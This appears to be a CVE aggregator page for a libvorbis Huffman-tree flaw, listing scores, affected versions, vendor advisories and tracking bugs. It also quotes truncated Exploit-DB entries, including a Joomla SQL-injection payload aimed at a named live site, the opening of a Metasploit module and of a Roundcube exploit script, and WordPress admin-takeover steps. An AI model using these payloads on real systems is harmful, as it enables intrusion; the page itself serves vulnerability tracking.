CVE-2008-2009
Published 2008-05-16. CVE-2008-2009: Xiph.org libvorbis before 1.0 does not properly check for underpopulated Huffman trees, which allows remote attackers to cause a denial of service (crash) via…
Priority: P418 · medium · 4.3 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:N/I:N/A:P
EPSS: 3.51% (87.7th percentile)
Xiph.org libvorbis before 1.0 does not properly check for underpopulated Huffman trees, which allows remote attackers to cause a denial of service (crash) via a crafted OGG file that triggers memory corruption during execution of the _make_decode_tree function.
Affected
11 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| debian | libvorbis | < libvorbis 1.2.0.dfsg-4 (bookworm) | libvorbis 1.2.0.dfsg-4 (bookworm) |
| debian | libvorbisidec | < libvorbis 1.2.0.dfsg-4 (bookworm) | libvorbis 1.2.0.dfsg-4 (bookworm) |
| xiph.org | libvorbis | — | — |
| xiph.org | libvorbis | >= 0 < 1.2.0.dfsg-4 | 1.2.0.dfsg-4 |
| xiph.org | libvorbis | >= 0 < 1.2.0.dfsg-4 | 1.2.0.dfsg-4 |
| xiph.org | libvorbis | >= 0 < 1.2.0.dfsg-4 | 1.2.0.dfsg-4 |
| xiph.org | libvorbis | >= 0 < 1.2.0.dfsg-4 | 1.2.0.dfsg-4 |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 4.3 | MEDIUM | AV:N/AC:M/Au:N/C:N/I:N/A:P |
| osv | — | 4.3 | MEDIUM | — |
| vendor_redhat | — | 10.0 | CRITICAL | — |
| vendor_debian | — | 4.3 | MEDIUM | — |
| vendor_ubuntu | — | 4.3 | MEDIUM | — |
Red Hat · vendor_redhat · 2015-02-06 · CVSS 2.1
CVE-2009-1193 [LOW] dbus: invalid signatures verified as valid due to improper fix for CVE-2008-3834
No description is available for this CVE.
Ubuntu · vendor_ubuntu · 2009-11-24 · CVSS 4.3
CVE-2008-2009 [MEDIUM] libvorbis vulnerabilities
It was discovered that libvorbis did not correctly handle ogg files with
underpopulated Huffman trees. If a user were tricked into opening a
specially crafted ogg file with an application that uses libvorbis, an
attacker could cause a denial of service. (CVE-2008-2009)
It was discovered that libvorbis did not correctly handle certain malformed
ogg files. If a user were tricked into opening a specially crafted ogg file
with an application that uses libvorbis, an attacker could cause a denial
of service or possibly execute arbitrary code with the user's privileges.
(CVE-2009-3379)
Instructions: After a standard system upgrade you need to restart any applications that
use libvorbis, such as Totem and gtkpod, to effect the
Red Hat · vendor_redhat · 2009-05-02 · CVSS 6.8
CVE-2009-1376 [MEDIUM] pidgin incomplete fix for CVE-2008-2927
Multiple integer overflows in the msn_slplink_process_msg functions in the MSN protocol handler in (1) libpurple/protocols/msn/slplink.c and (2) libpurple/protocols/msnp9/slplink.c in Pidgin (formerly Gaim) before 2.5.6 on 32-bit platforms allow remote attackers to execute arbitrary code via a malformed SLP message with a crafted offset value, leading to buffer overflows. NOTE: this issue exists because of an incomplete fix for CVE-2008-2927.
Red Hat · vendor_redhat · 2009-01-11 · CVSS 5.8
CVE-2009-0125 [MEDIUM] libnasl: OpenSSL incorrect checks for malformed signatures
NOTE: this issue has been disputed by the upstream vendor. nasl/nasl_crypto2.c in the Nessus Attack Scripting Language library (aka libnasl) 2.2.11 does not properly check the return value from the OpenSSL DSA_do_verify function, which allows remote attackers to bypass validation of the certificate chain via a malformed SSL/TLS signature, a similar vulnerability to CVE-2008-5077. NOTE: the upstream vendor has disputed this issue, stating "while we do misuse this function (this is a bug), it has absolutely no security ramification.
Red Hat · vendor_redhat · 2009-01-07 · CVSS 5.8
CVE-2009-0021 [MEDIUM] ntp incorrectly checks for malformed signatures
NTP 4.2.4 before 4.2.4p5 and 4.2.5 before 4.2.5p150 does not properly check the return value from the OpenSSL EVP_VerifyFinal function, which allows remote attackers to bypass validation of the certificate chain via a malformed SSL/TLS signature for DSA and ECDSA keys, a similar vulnerability to CVE-2008-5077.
Red Hat · vendor_redhat · 2008-12-11 · CVSS 5.8
CVE-2009-0547 [MEDIUM] evolution-data-server: S/MIME signatures are considered to be valid even for modified messages (MITM)
Evolution 2.22.3.1 checks S/MIME signatures against a copy of the e-mail text within a signed-data blob, not the copy of the e-mail text displayed to the user, which allows remote attackers to spoof a signature by modifying the latter copy, a different vulnerability than CVE-2008-5077.
Red Hat · vendor_redhat · 2008-11-19 · CVSS 2.6
CVE-2008-5161 [LOW] OpenSSH: Plaintext Recovery Attack against CBC ciphers
Error handling in the SSH protocol in (1) SSH Tectia Client and Server and Connector 4.0 through 4.4.11, 5.0 through 5.2.4, and 5.3 through 5.3.8; Client and Server and ConnectSecure 6.0 through 6.0.4; Server for Linux on IBM System z 6.0.4; Server for IBM z/OS 5.5.1 and earlier, 6.0.0, and 6.0.1; and Client 4.0-J through 4.3.3-J and 4.0-K through 4.3.10-K; and (2) OpenSSH 4.7p1 and possibly other versions, when using a block cipher algorithm in Cipher Block Chaining (CBC) mode, makes it easier for remote attackers to recover certain plaintext data from an arbitrary block of ciphertext in an SSH session via unknown vectors.
Statement: This issue was addressed for Red Hat Enterprise Linux 5 by
https://rhn.redhat.com/errata/RHSA-2009-1
Red Hat · vendor_redhat · 2008-08-06 · CVSS 6.9
CVE-2009-0316 [MEDIUM] vim: untrusted python modules search path
Untrusted search path vulnerability in src/if_python.c in the Python interface in Vim before 7.2.045 allows local users to execute arbitrary code via a Trojan horse Python file in the current working directory, related to a vulnerability in the PySys_SetArgv function (CVE-2008-5983), as demonstrated by an erroneous search path for plugin/bike.vim in bicyclerepair.
Statement: This issue did not affect vim as shipped in Red Hat Enterprise Linux 3 and 4. This issue is not planned to be fixed in vim packages in Red Hat Enterprise Linux 5.
Package: vim (Red Hat Enterprise Linux 4) - Not affected
Package: vim (Red Hat Enterprise Linux 5) - Will not fix
Red Hat · vendor_redhat · 2008-07-31 · CVSS 10.0
CVE-2008-3496 [CRITICAL] kernel: uvcvideo: Fix a buffer overflow in format descriptor parsing
Buffer overflow in format descriptor parsing in the uvc_parse_format function in drivers/media/video/uvc/uvc_driver.c in uvcvideo in the video4linux (V4L) implementation in the Linux kernel before 2.6.26.1 has unknown impact and attack vectors.
Statement: Not vulnerable. This issue did not affect the versions of Linux kernel as shipped with Red Hat Enterprise Linux 2.1, 3, 4, 5 or Red Hat Enterprise MRG.
The uvcvideo driver was first added in kernel packages update RHSA-2009:0225 in Red Hat Enterprise Linux 5.3, and it already contained a fix for this flaw.
Red Hat · vendor_redhat · 2008-05-14 · CVSS 4.3
CVE-2008-2009 [MEDIUM] vorbis: insufficient validation of Huffman tree causing memory corruption in _make_decode_tree()
Xiph.org libvorbis before 1.0 does not properly check for underpopulated Huffman trees, which allows remote attackers to cause a denial of service (crash) via a crafted OGG file that triggers memory corruption during execution of the _make_decode_tree function.
Red Hat · vendor_redhat · 2008-01-23 · CVSS 7.5
CVE-2008-7220 [HIGH] CWE-79 FrameWork: XSS Ajax requests (AST-2009-009)
Unspecified vulnerability in Prototype JavaScript framework (prototypejs) before 1.6.0.2 allows attackers to make "cross-site ajax requests" via unknown vectors.
Debian · vendor_debian · 2008 · CVSS 4.3
CVE-2008-2009 [MEDIUM] CVE-2008-2009: libvorbis - Xiph.org libvorbis before 1.0 does not properly check for underpopulated Huffman...
Xiph.org libvorbis before 1.0 does not properly check for underpopulated Huffman trees, which allows remote attackers to cause a denial of service (crash) via a crafted OGG file that triggers memory corruption during execution of the _make_decode_tree function.
Scope: local
bookworm: resolved (fixed in 1.2.0.dfsg-4)
bullseye: resolved (fixed in 1.2.0.dfsg-4)
forky: resolved (fixed in 1.2.0.dfsg-4)
sid: resolved (fixed in 1.2.0.dfsg-4)
trixie: resolved (fixed in 1.2.0.dfsg-4)
Red Hat · vendor_redhat · CVSS 5.0
CVE-2008-6680 [MEDIUM] clamav: security fixes in upstream 0.95 (CVE-2008-6680, CVE-2009-1270)
libclamav/pe.c in ClamAV before 0.95 allows remote attackers to cause a denial of service (crash) via a crafted EXE file that triggers a divide-by-zero error.
GHSA · ghsa_unreviewed · 2022-05-01
CVE-2008-2009 [MEDIUM] GHSA-m3p3-975g-rc2v: Xiph
Xiph.org libvorbis before 1.0 does not properly check for underpopulated Huffman trees, which allows remote attackers to cause a denial of service (crash) via a crafted OGG file that triggers memory corruption during execution of the _make_decode_tree function.
OSV · osv · 2008-05-16 · CVSS 4.3
CVE-2008-2009 [MEDIUM] CVE-2008-2009: Xiph
Xiph.org libvorbis before 1.0 does not properly check for underpopulated Huffman trees, which allows remote attackers to cause a denial of service (crash) via a crafted OGG file that triggers memory corruption during execution of the _make_decode_tree function.
No detection rules found.
Exploit-DB · exploitdb · 2010-07-03
CVE-2009-3103 Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit)
---
##
# $Id: ms09_050_smb2_negotiate_func_index.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference',
'Description' => %q{
This module exploits an out of bounds function table dereference in the SMB
request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7
release candidates (not RTM), and Windows 2008 Serv
Exploit-DB · exploitdb · 2009-07-17
CVE-2009-2554 Joomla! Component Jobline 1.3.1 - Blind SQL Injection
---
##################################################
# Joomla Component: Jobline magic_quotes_gpc =Off
# ==================================
# {Author}: ManhLuat93
# {My HomePage}: http://manhluat.com/
##################################################
Live Demo: http://www.ntca.org/index.php?option=com_jobline&task=results&Itemid=&search=
[-] Exploit [+]
[--] http://localh0st/index.php?option=com_jobline&task=results&Itemid=&search=%' and substring(@@version,1,1)=5 and '%'='
[++] http://www.ntca.org/index.php?option=com_jobline&task=results&Itemid=&search=%' and substring(@@version,1,1)=5 and '%'='
note:
Jobline
08 Jan 2008
1.3.1
1.5
(c) 2006 Olle Johansson
GNU GPL
# milw0rm.com [2009-07-17]
Exploit-DB · exploitdb · 2009-07-09 · CVSS 6.9
CVE-2008-3531 [MEDIUM] FreeBSD 7.0/7.1 - 'vfs.usermount' Local Privilege Escalation
---
/*
* cve-2008-3531.c -- Patroklos Argyroudis, argp at domain census-labs.com
*
* Privilege escalation exploit for the FreeBSD-SA-08:08.nmount
* (CVE-2008-3531) vulnerability:
*
* http://security.freebsd.org/advisories/FreeBSD-SA-08:08.nmount.asc
* http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3531
*
* For a detailed analysis see:
*
* http://census-labs.com/news/2009/07/02/cve-2008-3531-exploit/
*
* Sample run:
*
* [argp@leon ~]$ uname -rsi
* FreeBSD 7.0-RELEASE GENERIC
* [argp@leon ~]$ sysctl vfs.usermount
* vfs.usermount: 1
* [argp@leon ~]$ id
* uid=1001(argp) gid=1001(argp) groups=1001(argp)
* [argp@leon ~]$ gcc -Wall cve-2008-3531.c -o cve-2008-3531
* [argp@leon ~]$ ./cve-2008-3531
* [*] vptr = 0x006e776f
* [*
Exploit-DB · exploitdb · 2009-03-23
CVE-2009-1236 Apple Mac OSX xnu 1228.3.13 - 'zip-notify' Remote Kernel Overflow (PoC)
---
/* xnu-appletalk-zip.c
*
* Copyright (c) 2008 by
*
* Apple MACOS X xnu
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
int
main (int argc, char **argv)
{
struct sockaddr_at daddr, saddr;
char *p, buf[1024];
int fd, zlen;
printf ("Apple MACOS X xnu \n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
if (argc [src addr]\n", argv[0]);
exit (EXIT_FAILURE);
}
if (!atalk_aton (argv[1], &daddr.sat_addr))
{
fprintf (stderr, "* dst address: atalk_aton failed\n");
exit (EXIT_FAILURE);
}
if (argc > 3)
{
if (!atalk_aton (argv[3], &saddr.sat_addr))
{
fprintf (stderr, "* src address: atalk_aton failed\n");
exit (EXIT_FAILURE);
}
}
daddr.sat_family = AF_APPLET
Exploit-DB · exploitdb · 2009-03-23
CVE-2009-1237 Apple Mac OSX xnu 1228.3.13 - 'macfsstat' Local Kernel Memory Leak/Denial of Service
---
/* xnu-macfsstat-leak.c
*
* Copyright (c) 2008 by
*
* Apple MACOS X xnu
#include
#include
#include
#include
#include
#include
#include
#define LEAK_BUFBYTES(a) (sizeof (struct statfs)*a)
#define LEAK_MACBYTES(a) (sizeof (int)*a)
struct __mac_getfsstat {
char *buf; char _pad[4];
int bufsize; char __pad[4];
char *mac; char ___pad[4];
int macsize; char ____pad[4];
int flags; char _____pad[4];
};
int
main (int argc, char **argv)
{
struct __mac_getfsstat req;
int i, n;
printf ("Apple MACOS X xnu \n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
memset (&req, 0, sizeof req);
req.buf = (char *) 0xDEADBEEF;
req.bufsize = LEAK_BUFBYTES (65536 * 64);
req.mac = (char *) 0xDEADBEEF;
req.macsize
Exploit-DB · exploitdb · 2009-02-02
CVE-2009-0449 Kaspersky (Multiple Products) - 'klim5.sys' Local Privilege Escalation
---
source: https://www.securityfocus.com/bid/33561/info
Multiple Kaspersky products are prone to a local privilege-escalation vulnerability because the applications fail to perform adequate boundary checks on user-supplied data.
A local attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successfully exploiting this issue will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition.
This issue affects versions in the following product groups:
Kaspersky AV 2008
Kaspersky AV for WorkStations 6.0
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32771.zip
Exploit-DB · exploitdb · 2009-01-15
CVE-2009-0420 Joomla! Component RD-Autos 1.5.5 - SQL Injection
---
#############################################################################
# #
# Joomla Component RDAutos SQL Injection Vulnerability #
# #
#############################################################################
########################################
[~] Vulnerability found by: H!tm@N
[~] Contact: khghitman[at]gmail[dot]com
[~] Site: www.khg-crew.ws
[~] Greetz: boom3rang, KHG, urtan, war_ning, chs, redc00de
[~] -=[Kosova Hackers Group]=--=[KHG-Crew]=-
########################################
[~] ScriptName: "Joomla"
[~] Component: "RDAutos (com_rdautos)"
[~] Version: "1.5.5 Stable"
[~] Date: "29/09/2008"
[~] Author: "Robert Dam"
[~] Author E-mail: "[email protected]"
[~] Author URL: "www.rd-media.org"
#################
Exploit-DB · exploitdb · 2008-12-22 · CVSS 10.0
CVE-2008-5619 [CRITICAL] Roundcube Webmail 0.2b - Remote Code Execution
---
#!/bin/sh
#
# I was hoping the PoC would not appear so soon,
# but now that it is out,
# i thought i might as well publish my real exploit.
#
# Hunger
#
#
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5619
#
# FOR LEARNING PURPOSES ONLY!
#
# PHP> echo(ini_get('disable_functions'));
#
# exec, system
#
# PHP> passthru("id; uname -a");
#
# uid=666(www-data) gid=666(www-data) groups=666(www-data)
# Linux mail 2.6.28 #0 Sun Jan 01 10:05:33 CET 2009 i686 GNU/Linux
#
echo 'Exploit for Roundcube Webmail =\r\n\n'
if [ "$2" = "" ]; then echo "
Usage:
$0
Example:
\$ $0 localhost /roundcube/bin/html2text.php
For https sites use stunnel or socat!
"; exit 1; fi
NETCATEXE=`which nc`
BASE64ENC=`which base64`
if [ "$NETCATEXE" = "" ] ||
Exploit-DB · exploitdb · 2008-09-25
CVE-2009-0259 Microsoft Windows Wordpad - '.doc' File Local Denial of Service (PoC)
---
MS Windows Wordpad .doc File Local Denial of Service PoC
author: securfrog
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6560.rar (2008-crash.doc.rar)
# milw0rm.com [2008-09-25]
Exploit-DB · exploitdb · 2008-09-07
CVE-2009-2762 WordPress Core 2.6.1 - SQL Column Truncation
---
# WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)
#
# found by irk4z[at]yahoo.pl
# homepage: http://irk4z.wordpress.com/
#
# this is not critical vuln [;
#
# first, read this discovery:
# http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/
#
# in this hack we can remote change admin password, if registration enabled
#
# greets: Stefan Esser, Lukasz Pilorz, cOndemned, tbh, sid.psycho, str0ke and all fiends
1. go to url: server.com/wp-login.php?action=register
2. register as:
login: admin x
email: your email
^ admin[55 space chars]x
now, we have duplicated 'admin' account in database
3. go to url: server.com/wp-login.php?action=lostpassword
4. write your email into field and submit this form
5
Exploit-DB · exploitdb · 2008-07-07
CVE-2008-6838 Zoph 0.7.2.1 - 'search.php?_off' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/30116/info
Zoph is prone to a cross-site scripting vulnerability and multiple SQL-injection vulnerabilities.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Zoph 0.7.2.1 is vulnerable; other versions may also be affected.
UPDATE (July 2, 2009): The vendor disputes that Zoph is affected by these issues. Recent versions of Zoph are reported not vulnerable.
http://www.example.com/demo/search.php?_action=search&_off=[EvilScript]
Bugzilla · bugzilla · 2010-06-02 · CVSS 7.5
CVE-2009-4881 [HIGH] CVE-2009-4881 glibc (32-bit): Integer overflow in the __vstrfmon_l function
Common Vulnerabilities and Exposures assigned an identifier CVE-2009-4881 to
the following vulnerability:
Integer overflow in the __vstrfmon_l function in stdlib/strfmon_l.c in
the strfmon implementation in the GNU C Library (aka glibc or libc6)
before 2.10.1 allows context-dependent attackers to cause a denial of
service (application crash) via a crafted format string, as
demonstrated by the %99999999999999999999n string, a related issue to
CVE-2008-1391.
References:
[1] http://sources.redhat.com/bugzilla/show_bug.cgi?id=10600
[2] http://sourceware.org/git/?p=glibc.git;a=commit;h=153aa31b93be22e01b236375fb02a9f9b9a0195f
[3] http://sources.redhat.com/bugzilla/show_bug.cgi?id=10600
[4] http://securityreason.com/a
Bugzilla · bugzilla · 2010-06-02 · CVSS 7.5
CVE-2009-4880 [HIGH] CVE-2009-4880 glibc (32-bit): Multiple integer overflows in the printf implementation
Common Vulnerabilities and Exposures assigned an identifier CVE-2009-4880 to
the following vulnerability:
Multiple integer overflows in the strfmon implementation in the GNU C
Library (aka glibc or libc6) 2.10.1 and earlier allow
context-dependent attackers to cause a denial of service (memory
consumption or application crash) via a crafted format string, as
demonstrated by a crafted first argument to the money_format function
in PHP, a related issue to CVE-2008-1391.
References:
[1] http://securityreason.com/achievement_securityalert/67
[2] https://bugzilla.redhat.com/show_bug.cgi?id=524671
[3] http://sources.redhat.com/bugzilla/show_bug.cgi?id=10600
[4] http://sourceware.org/git/?p=glibc.git;a=commit
Bugzilla · bugzilla · 2009-11-09 · CVSS 5.0
CVE-2009-0033 [MEDIUM] CVE-2009-0033 CVE-2009-0580 CVE-2009-0783 CVE-2008-5515 CVE-2009-0781 Multiple tomcat5 vulnerabilities [Fedora all]
This is an automatically created tracking bug! It was created to ensure that one or more security vulnerabilities are fixed in all affected branches.
You should *not* refer to this bug publicly, as it is a private "Fedora Project Contributors" bug.
For comments that are specific to the vulnerability please use bugs filed against "Security Response" product referenced in "Blocks" field.
bug #493381: CVE-2009-0033 tomcat6 Denial-Of-Service with AJP connection
bug #503978: CVE-2009-0580 tomcat6 Information disclosure in authentication classes
bug #504153: CVE-2009-0783 tomcat XML parser information disclosure
bug #504753: CVE-2008-5515 tomcat request dispatcher information d
Bugzilla · bugzilla · 2009-04-15 · CVSS 5.0
CVE-2008-6679 [MEDIUM] CVE-2008-6679 CVE-2009-0196 CVE-2009-0792 ghostscript various flaws [F9]
F9 tracking bug: see blocks bug list for full details of the security issue(s).
[bug automatically created by: add-tracking-bugs]
Discussion:
ghostscript-8.63-3.fc9 has been submitted as an update for Fedora 9.
http://admin.fedoraproject.org/updates/ghostscript-8.63-3.fc9
---
ghostscript-8.63-3.fc9 has been pushed to the Fedora 9 stable repository. If problems still persist, please make note of it in this bug report.
Bugzilla · bugzilla · 2009-02-09 · CVSS 7.1
CVE-2008-4437 [HIGH] CVE-2008-4437 CVE-2008-6098, CVE-2009-048[13456] bugzilla: multiple issues [F10]
F10 tracking bug: see blocks bug list for full details of the security issue(s).
[bug automatically created by: add-tracking-bugs]
Discussion:
You can eventually use the following link to create the update request:
https://admin.fedoraproject.org/updates/new/?request=Stable&type_=security&release=Fedora%2010&bugs=484756,
---
Correct update submission URL is:
https://admin.fedoraproject.org/updates/new/?request=Stable&type_=security&bugs=484756,CVE-2008-6098,CVE-2009-0481,CVE-2009-0482,CVE-2009-0483,CVE-2009-0484,CVE-2009-0485,CVE-2009-0486
---
*** Bug 465959 has been marked as a duplicate of this bug. ***
---
CVE-2008-4437 fixed in upstream 3.0.5 is still unfixed too, adding it to this tracking bug
Bugzilla · bugzilla · 2009-01-17 · CVSS 5.0
CVE-2009-0030 [MEDIUM] CVE-2009-0030 squirrelmail: session management flaw
It was discovered that a backport of the patch for CVE-2008-3663 included in SquirrelMail packages as shipped in Red Hat Enterprise Linux 3, 4, and 5 contained a bug, that could result in different users being assigned insecure and identical session identifier. Such session identifiers were assigned if user logged out of SquirrelMail and logged in again without closing web browser.
This could result in sessions of the multiple users to "merge". Certain data from one user's session could have been displayed to other user (such as folder structure, address book and options, but not individual mails), or result in the overwrite of the preferences data with other user's settings.
Further details can be found in the bug #480224.
Discussio
Bugzilla · bugzilla · 2008-12-16 · CVSS 5.8
CVE-2008-5077 [MEDIUM] CVE-2008-5077 OpenSSL Incorrect checks for malformed signatures
Draft advisory from OpenSSL team:
OpenSSL Security Advisory [07-Jan-2009]
Incorrect checks for malformed signatures
Several functions inside OpenSSL incorrectly checked the result after
calling the EVP_VerifyFinal function, allowing a malformed signature
to be treated as a good signature rather than as an error. This issue
affected the signature checks on DSA and ECDSA keys used with
SSL/TLS.
One way to exploit this flaw would be for a remote attacker who is in
control of a malicious server or who can use a 'man in the middle'
attack to present a malformed SSL/TLS signature from a certificate chain
to a vulnerable client, bypassing validation.
This vulnerability is tracked as CVE-2008-5077.
The OpenSSL security team wou
Bugzilla · bugzilla · 2008-09-05 · CVSS 3.5
CVE-2008-3903 [LOW] CVE-2008-3903 asterisk: SIP valid account enumeration flaw
Common Vulnerabilities and Exposures assigned an identifier CVE-2008-3903 to the following vulnerability:
Asterisk PBX 1.2 through 1.6 and Trixbox PBX 2.6.1, when running with
Digest authentication and authalwaysreject enabled, generates
different responses depending on whether or not a SIP username is
valid, which allows remote attackers to enumerate valid usernames.
References:
http://misel.com/?p=52
Discussion:
Referenced advisory contains proposed patch, but there does not seem to be an official upstream advisory for this issue yet.
---
Upstream advisory with patches:
http://downloads.asterisk.org/pub/security/AST-2009-003.html
CVE-2008-3903 entry:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3903
---
I bel
Bugzilla · bugzilla · 2008-07-11 · CVSS 7.5
CVE-2008-3143 [HIGH] CVE-2008-3143 python: Multiple integer overflows discovered by Google
Description of problem:
Added checks for integer overflows, contributed by Google. Some are
only available if asserts are left in the code, in cases where they
can't be triggered from Python code.
Proposed upstream patch:
http://svn.python.org/view?rev=60793&view=rev
Discussion:
The Red Hat Security Response Team has rated this issue as having low security
impact, a future update may address this flaw. More information regarding
issue severity can be found here:
http://www.redhat.com/security/updates/classification/
---
This issue has been addressed in following products:
Red Hat Enterprise Linux 5
Via RHSA-2009:1176 https://rhn.redhat.com/errata/RHSA-2009-1176.html
---
This issue has been addressed in follow
Bugzilla · bugzilla · 2008-04-28 · CVSS 4.3
CVE-2008-2009 [MEDIUM] CVE-2008-2009 vorbis: insufficient validation of Huffman tree causing memory corruption in _make_decode_tree()
Will Drewry of the Google Security Team created a set of fuzzed OGG test files
to test OGG Vorbis and Tremor implementations. Some of them were causing memory
corruption and crash on old libvorbis versions (prior to 1.0).
Crash / corruption occurred in _make_decode_tree(). This function was removed
prior to the release of upstream version 1.0 in following changes:
https://trac.xiph.org/changeset/2959
https://trac.xiph.org/changeset/2960
Test files do not crash libvorbis revision 2960 or later.
Discussion:
Created attachment 303976
Patch from Monty (xiphmont)
Patch adds _check_words, a dry-run variant of _make_words, that performs
Huffman tree validation early in the str
References:
http://secunia.com/advisories/30247
http://www.redhat.com/support/errata/RHSA-2008-0271.html
http://www.securitytracker.com/id?1020029
http://www.ubuntu.com/usn/USN-861-1
http://www.vupen.com/english/advisories/2008/1510/references
https://bugzilla.redhat.com/show_bug.cgi?id=444443
https://exchange.xforce.ibmcloud.com/vulnerabilities/42521